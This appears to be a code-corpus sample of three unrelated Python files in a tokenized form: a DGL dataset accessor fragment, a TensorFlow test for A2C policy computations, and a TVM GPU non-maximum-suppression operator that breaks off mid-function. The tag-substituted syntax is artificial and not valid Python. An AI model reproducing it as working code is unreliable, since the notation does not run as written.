Datapoint index Returns ------- str SMILES for the ith datapoint DGLGraph DGLGraph for the ith datapoint Tensor of dtype float32 and shape (T) Labels of the ith datapoint for all tasks. T for the number of tasks. Tensor of dtype float32 and shape (T) Binary masks of the ith datapoint indicating the existence of labels for all tasks. str, optional Id for the ith datapoint, returned only when ``self.load_full`` is True. """<if_stmt>self.load_full<block_start><return>self.smiles[item] self.graphs[item] self.labels[item] self.mask[item] self.ids[item]<block_end><else_stmt><block_start><return>self.smiles[item] self.graphs[item] self.labels[item] self.mask[item]<block_end><block_end><block_end>
<import_from_stmt>collections namedtuple<import_stmt>tensorflow<as>tf<import_stmt>numpy<as>np<import_from_stmt>rl.agents.a2c.agent A2CAgent<line_sep>TestArgType=namedtuple('ArgType' ['name'])<line_sep>arg_type=TestArgType('arg')<line_sep>A=np.array<class_stmt>A2CAgentTest(tf.test.TestCase)<block_start><def_stmt>test_compute_policy_log_probs self<block_start><import_from_stmt>rl.agents.a2c.agent compute_policy_log_probs<line_sep>available_actions=A([[1 0 1] [1 0 0] [1 1 1]] dtype=np.float32)<line_sep>fn_pi=A([[0.2 0.0 0.8] [1.0 0.0 0.0] [0.2 0.7 0.1]] dtype=np.float32)<line_sep>fn_ids=A([2 0 1] dtype=np.int32)<line_sep>arg_pi={arg_type:A([[0.8 0.2] [0.0 1.0] [0.5 0.5]] dtype=np.float32)}<line_sep>arg_ids={arg_type:A([0 1 -1] dtype=np.int32)}<line_sep>log_probs=compute_policy_log_probs(available_actions (fn_pi arg_pi) (fn_ids arg_ids))<line_sep>expected_log_probs=np.log([0.8 1.0 0.7])+A([np.log(0.8) np.log(1.0) 0])<with_stmt>self.test_session()<as>sess<block_start>log_probs_out=sess.run(log_probs)<line_sep>self.assertAllClose(log_probs_out expected_log_probs)<block_end><block_end><def_stmt>test_compute_policy_entropy self<block_start><import_from_stmt>rl.agents.a2c.agent compute_policy_entropy<line_sep>available_actions=A([[1 0 1] [1 0 0] [1 1 1]] dtype=np.float32)<line_sep>fn_pi=A([[0.2 0.0 0.8] [1.0 0.0 0.0] [0.2 0.7 0.1]] dtype=np.float32)<line_sep>fn_ids=A([2 0 1] dtype=np.int32)<line_sep>arg_pi={arg_type:A([[0.8 0.2] [0.0 1.0] [0.5 0.5]] dtype=np.float32)}<line_sep>arg_ids={arg_type:A([0 1 -1] dtype=np.int32)}<line_sep>entropy=compute_policy_entropy(available_actions (fn_pi arg_pi) (fn_ids arg_ids))<line_sep>expected_entropy=(0.50040245+0.80181855)/3.0+(0.50040245)/2<with_stmt>self.test_session()<as>sess<block_start>entropy_out=sess.run(entropy)<line_sep>self.assertAllClose(entropy_out expected_entropy)<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>tf.test.main()<block_end>
# Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. # pylint: disable=invalid-name, no-member, too-many-locals, too-many-arguments, too-many-statements, singleton-comparison # pylint: disable=bad-continuation, unused-argument """Non-maximum suppression operator"""<import_stmt>tvm<import_from_stmt>tvm te<import_from_stmt>tvm.contrib nvcc<import_from_stmt>tvm.contrib.thrust can_use_thrust can_use_rocthrust<import_from_stmt>tvm.ir register_intrin_lowering<import_from_stmt>tvm.tir if_then_else<import_from_stmt>.sort argsort argsort_thrust<import_from_stmt>.scan exclusive_scan<import_from_stmt>..utils ceil_div<import_from_stmt>..math cast<import_from_stmt>..transform reshape<import_from_stmt>..vision.nms_util calculate_overlap binary_search collect_selected_indices collect_selected_indices_and_scores run_all_class_nms <def_stmt>cuda_atomic_add_rule op<block_start><if_stmt>op.dtype<eq>"float32"<block_start><return>tvm.tir.call_pure_extern("float32" "atomicAdd" op.args[0] op.args[1])<block_end><if_stmt>op.dtype<eq>"float64"<block_start><return>tvm.tir.call_pure_extern("float64" "atomicAdd" op.args[0] op.args[1])<block_end><if_stmt>op.dtype<eq>"int32"<block_start><return>tvm.tir.call_pure_extern("int32" "atomicAdd" op.args[0] op.args[1])<block_end><raise>RuntimeError("only support int32, float32 and float64")<block_end><def_stmt>opencl_atomic_add_rule op<block_start><if_stmt>op.dtype<eq>"int32"<block_start><return>tvm.tir.call_pure_extern("int32" "atomic_add" op.args[0] op.args[1])<block_end><raise>RuntimeError("only support int32")<block_end>register_intrin_lowering("tir.atomic_add" target="cuda" f=cuda_atomic_add_rule level=99)<line_sep>register_intrin_lowering("tir.atomic_add" target="opencl" f=opencl_atomic_add_rule level=99)<def_stmt>atomic_add x y<block_start><return>tvm.tir.call_intrin(y.dtype "tir.atomic_add" x y)<block_end><def_stmt>get_valid_boxes_ir data valid_boxes score_threshold id_index score_index<block_start>"""Low level IR to identify bounding boxes given a score threshold. Parameters ---------- data : Buffer Input data. 3-D Buffer with shape [batch_size, num_anchors, elem_length]. score_threshold : Buffer or float32 Lower limit of score for valid bounding boxes. id_index : optional, int index of the class categories, -1 to disable. score_index: optional, int Index of the scores/confidence of boxes. Returns ------- valid_boxes: Buffer 2D Buffer indicating valid boxes with shape [batch_size, num_anchors]. """<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep>elem_length=data.shape[2]<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>data=ib.buffer_ptr(data)<line_sep>valid_boxes=ib.buffer_ptr(valid_boxes)<if_stmt>isinstance(score_threshold float)<block_start>score_threshold=tvm.tir.FloatImm("float32" score_threshold)<block_end>id_index=tvm.tir.IntImm("int32" id_index)<line_sep>score_index=tvm.tir.IntImm("int32" score_index)<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<with_stmt>ib.new_scope()<block_start>nthread_tx=max_threads<line_sep>nthread_bx=ceil_div(num_anchors max_threads)<line_sep>nthread_by=batch_size<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>tid=bx<times>max_threads+tx<with_stmt>ib.if_scope(tid<l>num_anchors)<block_start>i=by<line_sep>j=tid<line_sep>score=data[(i<times>num_anchors+j)<times>elem_length+score_index]<with_stmt>ib.if_scope(tvm.tir.all(score<g>score_threshold tvm.tir.any(id_index<l>0 data[(i<times>num_anchors+j)<times>elem_length+id_index]<ge>0) ))<block_start>valid_boxes[i<times>num_anchors+j]=1<block_end><with_stmt>ib.else_scope()<block_start>valid_boxes[i<times>num_anchors+j]=0<block_end><block_end><block_end><return>ib.get()<block_end><def_stmt>get_valid_counts_ir data valid_indices valid_boxes out out_indices<block_start>"""Low level IR to get valid count of bounding boxes given a score threshold. Also prepares to move valid boxes to the top of input data. Parameters ---------- data : Buffer Input data. 3-D Buffer with shape [batch_size, num_anchors, elem_length]. valid_indices: Buffer 2D Buffer of flag indicating valid data with shape [batch_size, num_anchors]. Returns ------- out : Buffer Sorted valid boxes out_indices : Buffer Incidices of valid boxes in original data """<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep>elem_length=data.shape[2]<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>data=ib.buffer_ptr(data)<line_sep>valid_indices=ib.buffer_ptr(valid_indices)<line_sep>valid_boxes=ib.buffer_ptr(valid_boxes)<line_sep>out=ib.buffer_ptr(out)<line_sep>out_indices=ib.buffer_ptr(out_indices)<line_sep>one=tvm.tir.const(1 dtype=out.dtype)<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<line_sep>nthread_tx=max_threads<line_sep>nthread_bx=num_anchors<floordiv>max_threads+1<line_sep>nthread_by=batch_size<with_stmt>ib.new_scope()<block_start>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>tid=bx<times>max_threads+tx<with_stmt>ib.if_scope(tid<l>num_anchors)<block_start>i=by<line_sep>j=tid<with_stmt>ib.for_range(0 elem_length)<as>k<block_start>out[(i<times>num_anchors+j)<times>elem_length+k]=-one<block_end>out_indices[i<times>num_anchors+j]=-1<block_end><block_end><with_stmt>ib.new_scope()<block_start>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>tid=bx<times>max_threads+tx<with_stmt>ib.if_scope(tid<l>num_anchors)<block_start>i=by<line_sep>j=tid<with_stmt>ib.if_scope(valid_boxes[i tid]<g>0)<block_start><with_stmt>ib.for_range(0 elem_length)<as>k<block_start>out[(i<times>num_anchors+valid_indices[i tid])<times>elem_length+k]=data[(i<times>num_anchors+j)<times>elem_length+k]<block_end>out_indices[i<times>num_anchors+valid_indices[i tid]]=j<block_end><block_end><block_end><return>ib.get()<block_end><def_stmt>get_valid_counts data score_threshold=0 id_index=0 score_index=1<block_start>"""Get valid count of bounding boxes given a score threshold. Also moves valid boxes to the top of input data. Parameters ---------- data : tvm.te.Tensor Input data. 3-D tensor with shape [batch_size, num_anchors, elem_length]. score_threshold : optional, tvm.te.Tensor or float Lower limit of score for valid bounding boxes. id_index : optional, int index of the class categories, -1 to disable. score_index: optional, int Index of the scores/confidence of boxes. Returns ------- valid_count : tvm.te.Tensor 1-D tensor for valid number of boxes. out_tensor : tvm.te.Tensor Rearranged data tensor. """<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep>data_buf=tvm.tir.decl_buffer(data.shape data.dtype "data_buf" data_alignment=8)<line_sep>valid_boxes_buf=tvm.tir.decl_buffer((batch_size num_anchors) "int32" "valid_boxes_buf" data_alignment=8)<line_sep>valid_boxes=te.extern([(batch_size num_anchors)] [data] <lambda>ins outs:get_valid_boxes_ir(ins[0] outs[0] score_threshold id_index score_index) dtype=["int32"] in_buffers=[data_buf] out_buffers=[valid_boxes_buf] name="get_valid_boxes" tag="get_valid_boxes_gpu" )<line_sep>valid_indices_buf=tvm.tir.decl_buffer((batch_size num_anchors) "int32" "valid_indices_buf" data_alignment=8)<line_sep>valid_indices,valid_count=exclusive_scan(valid_boxes axis=1 return_reduction=<true>)<line_sep>out_buf=tvm.tir.decl_buffer(data.shape data.dtype "out_buf" data_alignment=8)<line_sep>out_indices_buf=tvm.tir.decl_buffer((batch_size num_anchors) "int32" "out_buf" data_alignment=8)<line_sep>out,out_indices=te.extern([data.shape (batch_size num_anchors)] [data valid_indices valid_boxes] <lambda>ins outs:get_valid_counts_ir(ins[0] ins[1] ins[2] outs[0] outs[1]) dtype=["int32" data.dtype] in_buffers=[data_buf valid_indices_buf valid_boxes_buf] out_buffers=[out_buf out_indices_buf] name="get_valid_counts" tag="get_valid_counts_gpu" )<line_sep><return>[valid_count out out_indices]<block_end><def_stmt>_nms_loop ib batch_size top_k iou_threshold max_output_size valid_count on_new_valid_box_func on_new_invalidated_box_func needs_bbox_check_func calc_overlap_func out_scores num_valid_boxes <block_start>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<with_stmt>ib.new_scope()<block_start>nthread_by=batch_size<line_sep>nthread_tx=max_threads<line_sep># Some cuda architectures have smaller limit of 32K for cudaDevAttrMaxRegistersPerBlock # vs 64K for most GPUs. Since this kernel uses many registers (around 35), the limit will # be exceeded with 1024 threads. target=tvm.target.Target.current(allow_none=<false>)<if_stmt>target.kind.name<eq>"cuda"<block_start><if_stmt>nvcc.get_target_compute_version(target)<in>["3.2" "5.3" "6.2"]<block_start>nthread_tx=512<block_end><block_end>by=te.thread_axis("blockIdx.y")<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>num_valid_boxes_local=ib.allocate("int32" (1 ) name="num_valid_boxes_local" scope="local")<line_sep>num_valid_boxes_local[0]=0<def_stmt>nms_inner_loop ib i j nkeep# The box j is valid, invalidate other boxes that overlap with j above iou_threshold <block_start>on_new_valid_box_func(ib tx num_valid_boxes_local[0] i j)<line_sep>num_valid_boxes_local[0]<augadd>1<line_sep>num_iter_per_thread=ceil_div(nkeep-(j+1) nthread_tx)<with_stmt>ib.for_range(0 num_iter_per_thread name="_k")<as>_k<block_start>k=j+1+_k<times>nthread_tx+tx<with_stmt>ib.if_scope(tvm.tir.all(k<l>nkeep out_scores[i k]<g>0 # is the box k still valid? needs_bbox_check_func(i j k) ))<block_start>iou=calc_overlap_func(i j k)<with_stmt>ib.if_scope(iou<ge>iou_threshold)# invalidate the box k <block_start>out_scores[i k]=-1.0<line_sep>on_new_invalidated_box_func(i k)<block_end><block_end>ib.emit(tvm.tir.Call(<none> "tir.tvm_storage_sync" tvm.runtime.convert(["shared"])))<block_end><block_end>i=by<line_sep>nkeep=if_then_else(tvm.tir.all(top_k<g>0 top_k<l>valid_count[i]) top_k valid_count[i])<line_sep>max_output_size=if_then_else(max_output_size<g>0 max_output_size nkeep)<with_stmt>ib.if_scope(tvm.tir.all(iou_threshold<g>0 valid_count[i]<g>0))# Apply nms # No need to do more iteration if we have already reached max_output_size boxes <block_start>box_idx=ib.allocate("int32" (1 ) name="box_idx" scope="local")<line_sep>box_idx[0]=0<with_stmt>ib.while_loop(tvm.tir.all(box_idx[0]<l>nkeep num_valid_boxes_local[0]<l>max_output_size))# Proceed to the inner loop if the box with id box_idx is still valid <block_start><with_stmt>ib.if_scope(out_scores[i box_idx[0]]<g>-1.0)<block_start>nms_inner_loop(ib i box_idx[0] nkeep)<block_end>box_idx[0]<augadd>1<block_end><with_stmt>ib.if_scope(tx+0<eq>0)<block_start>num_valid_boxes[i]=num_valid_boxes_local[0]<block_end><block_end><with_stmt>ib.else_scope()<block_start>num_valid_boxes[i]=0<block_end><block_end><return>ib.get()<block_end><def_stmt>nms_ir data sorted_index valid_count indices out_bboxes out_scores out_class_ids out_features box_indices num_valid_boxes max_output_size iou_threshold force_suppress top_k coord_start id_index score_index return_indices <block_start>"""Low level IR routing for transform location in multibox_detection operator. Parameters ---------- data : Buffer Buffer of output boxes with class and score. sorted_index : Buffer Buffer of output box indexes sorted by score. valid_count : Buffer Buffer of number of valid output boxes. indices : Buffer indices in original tensor, with shape [batch_size, num_anchors], represents the index of box in original data. It could be the third output out_indices of get_valid_counts. The values in the second dimension are like the output of arange(num_anchors) if get_valid_counts is not used before non_max_suppression. out_bboxes : Buffer Output buffer, to be filled with sorted box coordinates. out_scores : Buffer Output buffer, to be filled with sorted scores. out_class_ids : Buffer Output buffer, to be filled with sorted class ids. box_indices : Buffer A indices tensor mapping sorted indices to original indices This is the first output of NMS when return_indices=True. num_valid_boxes : Buffer Record the number of boxes that have survived IOU tests. This is the second output of NMS when return_indices=True. max_output_size : int Max number of output valid boxes for each instance. By default all valid boxes are returned. iou_threshold : float Overlapping(IoU) threshold to suppress object with smaller score. force_suppress : boolean Whether to suppress all detections regardless of class_id. top_k : int Keep maximum top k detections before nms, -1 for no limit. coord_start : int Start index of the consecutive 4 coordinates. id_index : int index of the class categories, -1 to disable. score_index : optional, int Index of the scores/confidence of boxes. return_indices : boolean Whether to return box indices in input data. Returns ------- stmt : Stmt The result IR statement. """<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep>box_data_length=data.shape[2]<line_sep>num_features=out_features.shape[2]<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>data=ib.buffer_ptr(data)<line_sep>sorted_index=ib.buffer_ptr(sorted_index)<line_sep>valid_count=ib.buffer_ptr(valid_count)<line_sep>indices=ib.buffer_ptr(indices)<line_sep># outputs out_bboxes=ib.buffer_ptr(out_bboxes)<line_sep>out_scores=ib.buffer_ptr(out_scores)<line_sep>out_class_ids=ib.buffer_ptr(out_class_ids)<line_sep>out_features=ib.buffer_ptr(out_features)<line_sep>box_indices=ib.buffer_ptr(box_indices)<line_sep>num_valid_boxes=ib.buffer_ptr(num_valid_boxes)<if_stmt>isinstance(iou_threshold float)<block_start>iou_threshold=tvm.tir.FloatImm("float32" iou_threshold)<block_end>top_k=tvm.tir.IntImm("int32" top_k)<line_sep>coord_start=tvm.tir.IntImm("int32" coord_start)<line_sep>id_index=tvm.tir.IntImm("int32" id_index)<line_sep>score_index=tvm.tir.IntImm("int32" score_index)<line_sep>force_suppress=tvm.tir.IntImm("int32" 1<if>force_suppress<else>0)<line_sep>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<with_stmt>ib.new_scope()<block_start>nthread_tx=max_threads<line_sep>nthread_bx=ceil_div(num_anchors max_threads)<line_sep>nthread_by=batch_size<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(by "thread_extent" nthread_by)<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>i=by<line_sep>base_src_idx=i<times>num_anchors<times>box_data_length<line_sep>base_bbox_idx=i<times>num_anchors<times>4<line_sep>base_features_idx=i<times>num_anchors<times>num_features<with_stmt>ib.if_scope(tvm.tir.all(iou_threshold<g>0 valid_count[i]<g>0))# Reorder output <block_start>nkeep=if_then_else(tvm.tir.all(top_k<g>0 top_k<l>valid_count[i]) top_k valid_count[i])<line_sep>j=bx<times>max_threads+tx<with_stmt>ib.if_scope(j<l>nkeep)<block_start>src_idx=base_src_idx+sorted_index[i<times>num_anchors+j]<times>box_data_length<with_stmt>ib.for_range(0 4 kind="unroll")<as>k<block_start>out_bboxes[(base_bbox_idx+j<times>4+k)]=data[src_idx+coord_start+k]<block_end><with_stmt>ib.for_range(0 num_features kind="unroll")<as>k<block_start>out_features[(base_features_idx+j<times>num_features+k)]=data[src_idx+coord_start+4+k]<block_end>out_scores[i<times>num_anchors+j]=data[src_idx+score_index]<if_stmt>id_index<ge>0<block_start>out_class_ids[i<times>num_anchors+j]=data[src_idx+id_index]<block_end><block_end><with_stmt>ib.else_scope()# Indices > nkeep are discarded # Only needed for return_indices = False case <block_start><if_stmt>return_indices<is><false><block_start><with_stmt>ib.if_scope(j<l>num_anchors)<block_start><with_stmt>ib.for_range(0 4 kind="unroll")<as>k<block_start>out_bboxes[(base_bbox_idx+j<times>4+k)]=-1.0<block_end><with_stmt>ib.for_range(0 num_features kind="unroll")<as>k<block_start>out_features[(base_features_idx+j<times>num_features+k)]=-1.0<block_end>out_scores[i j]=-1.0<if_stmt>id_index<ge>0<block_start>out_class_ids[i j]=-1.0<block_end><block_end><block_end><block_end><if_stmt>return_indices<block_start><with_stmt>ib.if_scope(j<l>num_anchors)<block_start>box_indices[i<times>num_anchors+j]=-1<block_end><block_end><block_end><with_stmt>ib.else_scope()# Need to copy all boxes if not using return_indices <block_start>bounds=valid_count[i]<if>return_indices<else>num_anchors<with_stmt>ib.if_scope(j<l>bounds)<block_start>src_offset=base_src_idx+j<times>box_data_length<with_stmt>ib.for_range(0 4 kind="unroll")<as>k<block_start>out_bboxes[base_bbox_idx+j<times>4+k]=data[src_offset+coord_start+k]<block_end><with_stmt>ib.for_range(0 num_features kind="unroll")<as>k<block_start>out_features[(base_features_idx+j<times>num_features+k)]=data[src_offset+coord_start+4+k]<block_end>out_scores[i<times>num_anchors+j]=data[src_offset+score_index]<if_stmt>id_index<ge>0<block_start>out_class_ids[i<times>num_anchors+j]=data[src_offset+id_index]<block_end>box_indices[i<times>num_anchors+j]=j<block_end><block_end><block_end><if_stmt>isinstance(max_output_size int)<block_start>max_output_size=tvm.tir.const(max_output_size)<block_end><def_stmt>calc_overlap i j k<block_start>offset_j=j<times>4<line_sep>offset_k=k<times>4<line_sep>base_bbox_idx=i<times>num_anchors<times>4<line_sep><return>calculate_overlap(out_bboxes base_bbox_idx+offset_j base_bbox_idx+offset_k )<block_end><def_stmt>on_new_valid_box ib tid num_current_valid_box i j# When return_indices is False, no need to populate box_indices <block_start><if_stmt>return_indices<block_start><with_stmt>ib.if_scope(tid+0<eq>0)<block_start>orig_idx=sorted_index[i<times>num_anchors+j]<line_sep>box_indices[i num_current_valid_box]=indices[i orig_idx]<block_end><block_end><block_end><def_stmt>on_new_invalidated_box i k<block_start><if_stmt>return_indices<is><false><and>id_index<ge>0<block_start>out_class_ids[i k]=-1.0<block_end><block_end><def_stmt>needs_bbox_check i j k<block_start><return>tvm.tir.any(force_suppress<g>0 id_index<l>0 out_class_ids[i k]<eq>out_class_ids[i j] )<block_end><return>_nms_loop(ib batch_size top_k iou_threshold max_output_size valid_count on_new_valid_box on_new_invalidated_box needs_bbox_check calc_overlap out_scores num_valid_boxes )<block_end><def_stmt>_fetch_score_ir data score axis<block_start>""" Fetch score from data. This routine is required for dynamic shape nms. """<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep>elem_length=data.shape[2]<line_sep>ib=tvm.tir.ir_builder.create()<line_sep>data=ib.buffer_ptr(data)<line_sep>score=ib.buffer_ptr(score)<with_stmt>ib.if_scope(num_anchors<g>0)<block_start>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<line_sep>nthread_tx=max_threads<line_sep>nthread_bx=batch_size<times>num_anchors<floordiv>max_threads+1<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>tid=bx<times>max_threads+tx<with_stmt>ib.if_scope(tid<l>batch_size<times>num_anchors)<block_start>score[tid]=data[tid<times>elem_length+axis]<block_end><block_end><return>ib.get()<block_end><def_stmt>_dispatch_sort scores ret_type="indices"<block_start>target=tvm.target.Target.current()<if_stmt>target<and>(can_use_thrust(target "tvm.contrib.thrust.sort")<or>can_use_rocthrust(target "tvm.contrib.thrust.sort"))<block_start><return>argsort_thrust(scores axis=1 is_ascend=<false> dtype="int32" ret_type=ret_type)<block_end><return>argsort(scores axis=1 is_ascend=<false> dtype="int32" ret_type=ret_type)<block_end><def_stmt>_get_sorted_indices data data_buf score_index score_shape<block_start>"""Extract a 1D score tensor from the packed input and do argsort on it."""<line_sep>score_buf=tvm.tir.decl_buffer(score_shape data.dtype "score_buf" data_alignment=8)<line_sep>score_tensor=te.extern([score_shape] [data] <lambda>ins outs:_fetch_score_ir(ins[0] outs[0] score_index ) dtype=[data.dtype] in_buffers=[data_buf] out_buffers=[score_buf] name="fetch_score" tag="fetch_score" )<line_sep><return>_dispatch_sort(score_tensor)<block_end><def_stmt>_run_nms data data_buf sort_tensor valid_count indices max_output_size iou_threshold force_suppress top_k coord_start id_index score_index return_indices <block_start>"""Run NMS using sorted scores."""<line_sep>sort_tensor_buf=tvm.tir.decl_buffer(sort_tensor.shape sort_tensor.dtype "sort_tensor_buf" data_alignment=8)<line_sep>valid_count_dtype="int32"<line_sep>valid_count_buf=tvm.tir.decl_buffer(valid_count.shape valid_count_dtype "valid_count_buf" data_alignment=4)<line_sep>indices_buf=tvm.tir.decl_buffer(indices.shape indices.dtype "indices_buf" data_alignment=8)<line_sep>batch_size=data.shape[0]<line_sep>num_anchors=data.shape[1]<line_sep># Number of extra features per box beyond coords, score, and id. num_features=data.shape[2]-6<if>id_index<ge>0<else>data.shape[2]-5<line_sep># output shapes bbox_shape=(batch_size num_anchors 4)<line_sep>score_shape=(batch_size num_anchors)<line_sep>class_id_shape=score_shape<line_sep>out_features_shape=(batch_size num_anchors num_features)<line_sep>box_indices_shape=score_shape<line_sep>num_valid_boxes_shape=(batch_size 1)<line_sep><return>te.extern([bbox_shape score_shape class_id_shape out_features_shape box_indices_shape num_valid_boxes_shape ] [data sort_tensor valid_count indices] <lambda>ins outs:nms_ir(ins[0] ins[1] ins[2] ins[3] outs[0] # sorted bbox outs[1] # sorted scores outs[2] # sorted class ids outs[3] # sorted box feats outs[4] # box_indices outs[5] # num_valid_boxes max_output_size iou_threshold force_suppress top_k coord_start id_index score_index return_indices ) dtype=[data.dtype "float32" "float32" "float32" "int32" "int32"] in_buffers=[data_buf sort_tensor_buf valid_count_buf indices_buf] name="nms" tag="nms" )<block_end><def_stmt>_concatenate_outputs out_bboxes out_scores out_class_ids out_features out_shape coord_start score_index id_index <block_start>"""Pack the results from NMS into a single 5D or 6D tensor."""<line_sep>batch_size=out_bboxes.shape[0]<line_sep>num_anchors=out_bboxes.shape[1]<line_sep>num_features=out_features.shape[2]<def_stmt>ir out_bboxes out_scores out_class_ids out<block_start>ib=tvm.tir.ir_builder.create()<line_sep>out_bboxes=ib.buffer_ptr(out_bboxes)<line_sep>out_scores=ib.buffer_ptr(out_scores)<line_sep>out_class_ids=ib.buffer_ptr(out_class_ids)<line_sep>out=ib.buffer_ptr(out)<with_stmt>ib.if_scope(num_anchors<g>0)<block_start>max_threads=int(tvm.target.Target.current(allow_none=<false>).max_num_threads)<line_sep>nthread_tx=max_threads<line_sep>nthread_bx=ceil_div(num_anchors nthread_tx)<line_sep>tx=te.thread_axis("threadIdx.x")<line_sep>bx=te.thread_axis("blockIdx.x")<line_sep>by=te.thread_axis("blockIdx.y")<line_sep>ib.scope_attr(tx "thread_extent" nthread_tx)<line_sep>ib.scope_attr(bx "thread_extent" nthread_bx)<line_sep>ib.scope_attr(by "thread_extent" batch_size)<line_sep>tid=bx<times>nthread_tx+tx<line_sep>i=by<with_stmt>ib.if_scope(tid<l>num_anchors)<block_start><with_stmt>ib.for_range(0 4 kind="unroll")<as>j<block_start>out[i tid coord_start+j]=out_bboxes[i tid j]<block_end><with_stmt>ib.for_range(0 num_features kind="unroll")<as>j<block_start>out[i tid coord_start+4+j]=out_features[i tid j]<block_end>out[i tid score_index]=out_scores[i tid]<if_stmt>id_index<ge>0<block_start>out[i tid id_index]=out_class_ids[i tid]<block_end><block_end><block_end><return>ib.get()<block_end><return>te.extern([out_shape] [out_bboxes out_scores out_class_ids] <lambda>ins outs:ir(ins[0] ins[1] ins[2] outs[0]) dtype=["float32"] name="nms_output_concat" tag="nms_output_concat" )<block_end><def_stmt>non_max_suppression data valid_count indices max_output_size=-1 iou_threshold=0.5 force_suppress=<false> top_k=-1 coord_start=2 score_index=1 id_index=0 return_indices=<true> invalid_to_bottom=<false> <block_start>"""Non-maximum suppression operator for object detection. Parameters ---------- data : tvm.te.Tensor 3-D tensor with shape [batch_size, num_anchors, elem_length]. The last dimension should be in format of [class_id, score, box_left, box_top, box_right, box_bottom]. It could be the second output out_tensor of get_valid_counts. valid_count : tvm.te.Tensor 1-D tensor for valid number of boxes. It could be the output valid_count of get_valid_counts. indices : tvm.te.Tensor 2-D tensor with shape [batch_size, num_anchors], represents the index of box in original data. It could be the third output out_indices of get_valid_counts. The values in the second dimension are like the output of arange(num_anchors) if get_valid_counts is not used before non_max_suppression. max_output_size : optional, tvm.te.Tensor or int Max number of output valid boxes for each instance. By default all valid boxes are returned. iou_threshold : optional, tvm.te.Tensor or float Non-maximum suppression threshold. force_suppress : optional, boolean Whether to suppress all detections regardless of class_id. top_k : optional, int Keep maximum top k detections before nms, -1 for no limit. coord_start : required, int Start index of the consecutive 4 coordinates. score_index : optional, int Index of the scores/confidence of boxes. id_index : optional, int index of the class categories, -1 to disable. return_indices : boolean Whether to return box indices in input data. invalid_to_bottom : optional, boolean Whether to move all valid bounding boxes to the top. Returns ------- out : tvm.te.Tensor 3-D tensor with shape [batch_size, num_anchors, elem_length]. Example -------- .. code-block:: python # An example to use nms dshape = (1, 5, 6) data = te.placeholder(dshape, name="data") valid_count = te.placeholder((dshape[0],), dtype="int32", name="valid_count") iou_threshold = 0.7 force_suppress = True top_k = -1 out = non_max_suppression(data=data, valid_count=valid_count, iou_threshold=iou_threshold, force_suppress=force_supress, top_k=top_k, return_indices=False) np_data = np.random.uniform(dshape) np_valid_count = np.array([4]) s = topi.generic.schedule_nms(out) f = tvm.build(s, [data, valid_count, out], "cuda") dev = tvm.cuda(0) tvm_data = tvm.nd.array(np_data, dev) tvm_valid_count = tvm.nd.array(np_valid_count, dev) tvm_out = tvm.nd.array(np.zeros(dshape, dtype=data.dtype), dev) f(tvm_data, tvm_valid_count, tvm_out) """<line_sep>data_buf=tvm.tir.decl_buffer(data.shape data.dtype "data_buf" data_alignment=8)<line_sep>sort_tensor=_get_sorted_indices(data data_buf score_index (data.shape[0] data.shape[1]))<line_sep>out_bboxes,out_scores,out_class_ids,out_features,box_indices,num_valid_boxes=_run_nms(data data_buf sort_tensor valid_count indices max_output_size iou_threshold force_suppress top_k coord_start id_index score_index return_indices )<if_stmt>return_indices<block_start><return>[box_indices num_valid_boxes]<block_end><return>_concatenate_outputs(out_bboxes out_scores out_class_ids out_features data.shape coord_start score_index id_index )<block_end><def_stmt>_get_valid_box_count scores score_threshold<block_start>batch_classes,num_boxes=scores.shape<def_stmt>searchsorted_ir scores 